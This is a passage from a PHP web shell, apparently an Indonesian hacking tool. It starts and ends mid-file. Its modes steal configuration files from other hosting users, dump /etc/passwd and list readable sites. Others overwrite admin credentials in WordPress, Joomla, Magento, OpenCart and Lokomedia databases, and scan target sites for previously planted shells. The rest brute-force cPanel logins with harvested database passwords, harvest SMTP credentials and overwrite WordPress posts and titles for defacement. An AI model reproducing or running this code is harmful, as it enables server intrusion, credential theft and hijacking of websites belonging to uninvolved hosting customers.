2882. "/home3/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",
2883. "/home3/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
2884. "/home3/$user_cox/public_html/forum/config.php" => "phpBB",
2885. "/home3/$user_cox/public_html/sites/default/settings.php" => "Drupal",
2886. "/home3/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
2887. "/home3/$user_cox/public_html/app/etc/local.xml" => "Magento",
2888. "/home3/$user_cox/public_html/admin/config.php" => "OpenCart",
2889. "/home3/$user_cox/public_html/slconfig.php" => "Sitelok",
2890. "/home3/$user_cox/public_html/application/config/database.php" => "Ellislab",
2891. "/home3/$user_cox/public_html/whm/configuration.php" => "WHMCS",
2892. "/home3/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
2893. "/home3/$user_cox/public_html/central/configuration.php" => "WHM Central",
2894. "/home3/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
2895. "/home3/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
2896. "/home3/$user_cox/public_html/submitticket.php" => "WHMCS",
2897. "/home3/$user_cox/public_html/configuration.php" => "Joomla",
2898. "/home3/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
2899. "/home3/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
2900. "/home3/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
2901. "/home3/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
2902. "/home3/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
2903. "/home3/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
2904. "/home3/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
2905. "/home3/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
2906. "/home3/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
2907. "/home3/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
2908. "/home3/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
2909. "/home3/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
2910. "/home3/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
2911. "/home3/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
2912. "/home3/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
2913. "/home3/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
2914. "/home3/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
2915. "/home3/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
2916. "/home3/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
2917. "/home3/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
2918. "/home3/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
2919. "/home3/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
2920. "/home3/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
2921. "/home3/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
2922. "/home3/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
2923. "/home3/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
2924. "/home3/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
2925. "/home3/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
2926. "/home3/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
2927. "/home3/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
2928. "/home3/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
2929. "/home3/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
2930. "/home3/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
2931. "/home3/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
2932. "/home3/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
2933. "/home3/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",
2934. "/home3/$user_cox/public_html/wp-config.php" => "WordPress",
2935. "/home3/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
2936. "/home3/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
2937. "/home3/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
2938. "/home3/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
2939. "/home3/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
2940. "/home3/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
2941. "/home3/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
2942. "/home3/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
2943. "/home3/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
2944. "/home3/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
2945. "/home3/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
2946. "/home3/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
2947. "/home3/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
2948. "/home3/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
2949. "/home3/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
2950. "/home3/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
2951. "/home3/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
2952. "/home3/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
2953. "/home3/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
2954. "/home3/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
2955. "/home3/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
2956. "/home3/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
2957. "/home3/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
2958. "/home3/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
2959. "/home3/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
2960. "/home3/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
2961. "/home3/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
2962. "/home3/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
2963. "/home3/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
2964. "/home3/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
2965. "/home3/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
2966. "/home3/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
2967. "/home3/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
2968. "/home3/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
2969. "/home3/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
2970. "/home3/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal"
2971. );
2972. foreach($grab_config as $config => $nama_config) {
2973. $ambil_config = file_get_contents($config);
2974. if($ambil_config == '') {
2975. } else {
2976. $file_config = fopen("cox_config/$user_cox-$nama_config.txt","w");
2977. fputs($file_config,$ambil_config);
2978. }
2979. }
2980. }
2981. }
2982. echo "<center><a href='?dir=$dir/cox_config'><font color=lime>Done</font></a></center>";
2983. }else{
2984.  
2985. echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
2986. echo file_get_contents('/etc/passwd');
2987. echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
2988. }
2989. } elseif($_GET['do'] == 'jumping') {
2990. $i = 0;
2991. echo "<pre><div class='margin: 5px auto;'>";
2992. $etc = fopen("/etc/passwd", "r");
2993. while($passwd = fgets($etc)) {
2994. if($passwd == '' || !$etc) {
2995. echo "<font color=red>Can't read /etc/passwd</font>";
2996. } else {
2997. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
2998. foreach($user_jumping[1] as $user_idx_jump) {
2999. $user_jumping_dir = "/home/$user_idx_jump/public_html";
3000. if(is_readable($user_jumping_dir)) {
3001. $i++;
3002. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
3003. if(is_writable($user_jumping_dir)) {
3004. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
3005. }
3006. echo $jrw;
3007. $domain_jump = file_get_contents("/etc/named.conf");
3008. if($domain_jump == '') {
3009. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
3010. } else {
3011. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
3012. foreach($domains_jump[1] as $dj) {
3013. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
3014. $user_jumping_url = $user_jumping_url['name'];
3015. if($user_jumping_url == $user_idx_jump) {
3016. echo " => ( <u>$dj</u> )<br>";
3017. break;
3018. }
3019. }
3020. }
3021. }
3022. }
3023. }
3024. }
3025. if($i == 0) {
3026. } else {
3027. echo "<br>Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST'])."";
3028. }
3029. echo "</div></pre>";
3030. } elseif($_GET['do'] == 'auto_edit_user') {
3031. if($_POST['hajar']) {
3032. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
3033. echo "username atau password harus lebih dari 6 karakter";
3034. } else {
3035. $user_baru = $_POST['user_baru'];
3036. $pass_baru = md5($_POST['pass_baru']);
3037. $conf = $_POST['config_dir'];
3038. $scan_conf = scandir($conf);
3039. foreach($scan_conf as $file_conf) {
3040. if(!is_file("$conf/$file_conf")) continue;
3041. $config = file_get_contents("$conf/$file_conf");
3042. if(preg_match("/JConfig|joomla/",$config)) {
3043. $dbhost = ambilkata($config,"host = '","'");
3044. $dbuser = ambilkata($config,"user = '","'");
3045. $dbpass = ambilkata($config,"password = '","'");
3046. $dbname = ambilkata($config,"db = '","'");
3047. $dbprefix = ambilkata($config,"dbprefix = '","'");
3048. $prefix = $dbprefix."users";
3049. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3050. $db = mysql_select_db($dbname);
3051. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
3052. $result = mysql_fetch_array($q);
3053. $id = $result['id'];
3054. $site = ambilkata($config,"sitename = '","'");
3055. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
3056. echo "Config => ".$file_conf."<br>";
3057. echo "CMS => Joomla<br>";
3058. if($site == '') {
3059. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
3060. } else {
3061. echo "Sitename => $site<br>";
3062. }
3063. if(!$update OR !$conn OR !$db) {
3064. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
3065. } else {
3066. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
3067. }
3068. mysql_close($conn);
3069. } elseif(preg_match("/WordPress/",$config)) {
3070. $dbhost = ambilkata($config,"DB_HOST', '","'");
3071. $dbuser = ambilkata($config,"DB_USER', '","'");
3072. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
3073. $dbname = ambilkata($config,"DB_NAME', '","'");
3074. $dbprefix = ambilkata($config,"table_prefix = '","'");
3075. $prefix = $dbprefix."users";
3076. $option = $dbprefix."options";
3077. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3078. $db = mysql_select_db($dbname);
3079. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
3080. $result = mysql_fetch_array($q);
3081. $id = $result[ID];
3082. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
3083. $result2 = mysql_fetch_array($q2);
3084. $target = $result2[option_value];
3085. if($target == '') {
3086. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
3087. } else {
3088. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
3089. }
3090. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
3091. echo "Config => ".$file_conf."<br>";
3092. echo "CMS => Wordpress<br>";
3093. echo $url_target;
3094. if(!$update OR !$conn OR !$db) {
3095. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
3096. } else {
3097. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
3098. }
3099. mysql_close($conn);
3100. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
3101. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
3102. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
3103. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
3104. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
3105. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
3106. $prefix = $dbprefix."admin_user";
3107. $option = $dbprefix."core_config_data";
3108. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3109. $db = mysql_select_db($dbname);
3110. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
3111. $result = mysql_fetch_array($q);
3112. $id = $result[user_id];
3113. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
3114. $result2 = mysql_fetch_array($q2);
3115. $target = $result2[value];
3116. if($target == '') {
3117. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
3118. } else {
3119. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
3120. }
3121. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
3122. echo "Config => ".$file_conf."<br>";
3123. echo "CMS => Magento<br>";
3124. echo $url_target;
3125. if(!$update OR !$conn OR !$db) {
3126. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
3127. } else {
3128. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
3129. }
3130. mysql_close($conn);
3131. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
3132. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
3133. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
3134. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
3135. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
3136. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
3137. $prefix = $dbprefix."user";
3138. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3139. $db = mysql_select_db($dbname);
3140. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
3141. $result = mysql_fetch_array($q);
3142. $id = $result[user_id];
3143. $target = ambilkata($config,"HTTP_SERVER', '","'");
3144. if($target == '') {
3145. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
3146. } else {
3147. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
3148. }
3149. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
3150. echo "Config => ".$file_conf."<br>";
3151. echo "CMS => OpenCart<br>";
3152. echo $url_target;
3153. if(!$update OR !$conn OR !$db) {
3154. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
3155. } else {
3156. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
3157. }
3158. mysql_close($conn);
3159. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
3160. $dbhost = ambilkata($config,'server = "','"');
3161. $dbuser = ambilkata($config,'username = "','"');
3162. $dbpass = ambilkata($config,'password = "','"');
3163. $dbname = ambilkata($config,'database = "','"');
3164. $prefix = "users";
3165. $option = "identitas";
3166. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3167. $db = mysql_select_db($dbname);
3168. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
3169. $result = mysql_fetch_array($q);
3170. $target = $result[alamat_website];
3171. if($target == '') {
3172. $target2 = $result[url];
3173. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
3174. if($target2 == '') {
3175. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
3176. } else {
3177. $cek_login3 = file_get_contents("$target2/adminweb/");
3178. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
3179. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
3180. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
3181. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
3182. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
3183. } else {
3184. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
3185. }
3186. }
3187. } else {
3188. $cek_login = file_get_contents("$target/adminweb/");
3189. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
3190. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
3191. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
3192. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
3193. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
3194. } else {
3195. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
3196. }
3197. }
3198. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
3199. echo "Config => ".$file_conf."<br>";
3200. echo "CMS => Lokomedia<br>";
3201. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
3202. echo $url_target2;
3203. } else {
3204. echo $url_target;
3205. }
3206. if(!$update OR !$conn OR !$db) {
3207. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
3208. } else {
3209. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
3210. }
3211. mysql_close($conn);
3212. }
3213. }
3214. }
3215. } else {
3216. echo "<center>
3217. <h1>Auto Edit User Config</h1>
3218. <form method='post'>
3219. DIR Config: <br>
3220. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
3221. Set User & Pass: <br>
3222. <input type='text' name='user_baru' value='0x1999' placeholder='user_baru'><br>
3223. <input type='text' name='pass_baru' value='0x1999' placeholder='pass_baru'><br>
3224. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
3225. </form>
3226. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
3227. ";
3228. }
3229. }elseif($_GET['do'] == 'shelscan') {
3230. echo'<center><h2>Shell Finder</h2>
3231. <form action="" method="post">
3232. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
3233. <br>
3234. <input name="scan" value="Start Scaning" style="width: 215px;" type="submit">
3235. </form><br>';
3236. if (isset($_POST["scan"])) {
3237. $url = $_POST['traget'];
3238. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
3239. echo "Result :<br />";
3240. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
3241. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
3242. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
3243. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
3244. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
3245. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
3246. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
3247. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
3248. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
3249. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
3250. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
3251. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
3252. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
3253. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
3254. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
3255. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
3256. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
3257. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
3258. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
3259. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
3260. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
3261. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
3262. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
3263. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
3264. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
3265. foreach ($shells as $shell){
3266. $headers = get_headers("$url$shell"); //
3267. if (eregi('200', $headers[0])) {
3268. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
3269. $dz = fopen('shells.txt', 'a+');
3270. $suck = "$url$shell";
3271. fwrite($dz, $suck."\n");
3272. }
3273. }
3274. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
3275. }
3276.  
3277. }
3278. elseif($_GET['do'] == 'cpanel') {
3279. if($_POST['crack']) {
3280. $usercp = explode("\r\n", $_POST['user_cp']);
3281. $passcp = explode("\r\n", $_POST['pass_cp']);
3282. $i = 0;
3283. foreach($usercp as $ucp) {
3284. foreach($passcp as $pcp) {
3285. if(@mysql_connect('localhost', $ucp, $pcp)) {
3286. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
3287. } else {
3288. $_SESSION[$ucp] = "1";
3289. $_SESSION[$pcp] = "1";
3290. $i++;
3291. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
3292. }
3293. }
3294. }
3295. }
3296. if($i == 0) {
3297. } else {
3298. echo "<br>Nemu ".$i." Cpanel by <font color=lime>JanCox</font>";
3299. }
3300. } else {
3301. echo "<center>
3302. <form method='post'>
3303. USER: <br>
3304. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
3305. $_usercp = fopen("/etc/passwd","r");
3306. while($getu = fgets($_usercp)) {
3307. if($getu == '' || !$_usercp) {
3308. echo "<font color=red>Can't read /etc/passwd</font>";
3309. } else {
3310. preg_match_all("/(.*?):x:/", $getu, $u);
3311. foreach($u[1] as $user_cp) {
3312. if(is_dir("/home/$user_cp/public_html")) {
3313. echo "$user_cp\n";
3314. }
3315. }
3316. }
3317. }
3318. echo "</textarea><br>
3319. PASS: <br>
3320. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
3321. function cp_pass($dir) {
3322. $pass = "";
3323. $dira = scandir($dir);
3324. foreach($dira as $dirb) {
3325. if(!is_file("$dir/$dirb")) continue;
3326. $ambil = file_get_contents("$dir/$dirb");
3327. if(preg_match("/WordPress/", $ambil)) {
3328. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
3329. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
3330. $pass .= ambilkata($ambil,"password = '","'")."\n";
3331. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
3332. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
3333. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
3334. $pass .= ambilkata($ambil,'password = "','"')."\n";
3335. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
3336. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
3337. } elseif(preg_match("/client/", $ambil)) {
3338. preg_match("/password=(.*)/", $ambil, $pass1);
3339. if(preg_match('/"/', $pass1[1])) {
3340. $pass1[1] = str_replace('"', "", $pass1[1]);
3341. $pass .= $pass1[1]."\n";
3342. }
3343. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
3344. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
3345. }
3346. }
3347. echo $pass;
3348. }
3349. $cp_pass = cp_pass($dir);
3350. echo $cp_pass;
3351. echo "</textarea><br>
3352. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
3353. </form>
3354. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
3355. }
3356. } elseif($_GET['do'] == 'smtp') {
3357. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
3358. function scj($dir) {
3359. $dira = scandir($dir);
3360. foreach($dira as $dirb) {
3361. if(!is_file("$dir/$dirb")) continue;
3362. $ambil = file_get_contents("$dir/$dirb");
3363. $ambil = str_replace("$", "", $ambil);
3364. if(preg_match("/JConfig|joomla/", $ambil)) {
3365. $smtp_host = ambilkata($ambil,"smtphost = '","'");
3366. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
3367. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
3368. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
3369. $smtp_port = ambilkata($ambil,"smtpport = '","'");
3370. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
3371. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
3372. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
3373. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
3374. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
3375. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
3376. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
3377. }
3378. }
3379. }
3380. $smpt_hunter = scj($dir);
3381. echo $smpt_hunter;
3382. } elseif($_GET['do'] == 'auto_wp') {
3383. if($_POST['hajar']) {
3384. $title = htmlspecialchars($_POST['new_title']);
3385. $pn_title = str_replace(" ", "-", $title);
3386. if($_POST['cek_edit'] == "Y") {
3387. $script = $_POST['edit_content'];
3388. } else {
3389. $script = $title;
3390. }
3391. $conf = $_POST['config_dir'];
3392. $scan_conf = scandir($conf);
3393. foreach($scan_conf as $file_conf) {
3394. if(!is_file("$conf/$file_conf")) continue;
3395. $config = file_get_contents("$conf/$file_conf");
3396. if(preg_match("/WordPress/", $config)) {
3397. $dbhost = ambilkata($config,"DB_HOST', '","'");
3398. $dbuser = ambilkata($config,"DB_USER', '","'");
3399. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
3400. $dbname = ambilkata($config,"DB_NAME', '","'");
3401. $dbprefix = ambilkata($config,"table_prefix = '","'");
3402. $prefix = $dbprefix."posts";
3403. $option = $dbprefix."options";
3404. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3405. $db = mysql_select_db($dbname);
3406. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
3407. $result = mysql_fetch_array($q);
3408. $id = $result[ID];
3409. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
3410. $result2 = mysql_fetch_array($q2);
3411. $target = $result2[option_value];
3412. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
3413. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
3414. echo "<div style='margin: 5px auto;'>";
3415. if($target == '') {
3416. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
3417. } else {
